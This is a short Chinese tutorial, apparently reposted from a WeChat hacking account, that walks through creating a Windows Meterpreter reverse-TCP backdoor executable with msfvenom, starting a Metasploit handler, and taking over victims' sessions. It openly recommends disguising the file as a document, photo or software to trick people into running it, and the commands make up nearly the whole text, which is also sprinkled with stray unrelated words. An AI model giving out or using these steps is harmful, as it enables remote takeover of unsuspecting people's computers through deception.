须要的工具:msfvenom . msfconsole (kali里面有)
msfvenom -p windows/meterpreter/reverse_tcp LHOST=本地ip LPORT=本地端口号 –f exe –o 文件名.exe
即生成一个后门文件xss.exe(我这里是将文件名命名为xss的)windows
而后继续执行命令:安全
msfconsole (运行msfconsole)微信
msf>use exploit/multi/handler (选择模块)session
msf exploit(handler) > set payload windows/meterpreter/reverse_tcpxss
set lhost 加ip地址 set lport 加端口号tcp
这样木马就配置好了,而后发给别人(能够伪形成文档,照片,软件等文件骗取别人打开)工具
发给别人后,等待别人打开xss.exe,打开即上钩了spa
msf exploit(handler) > sessions(查看上钩的用户).net
msf exploit(handler) > sessions -i 1(选择须要攻击的用户,这里选择第 1 个)blog
进入meterpreter了,便可进行一些相关的木马操做。
请你们,深度理解黑客技术,树立安全防范攻防意识
本文分享自微信公众号 - 黑客秘房(hackers0101)。
若有侵权,请联系 support@oschina.cn 删除。
本文参与“OSC源创计划”,欢迎正在阅读的你也加入,一块儿分享。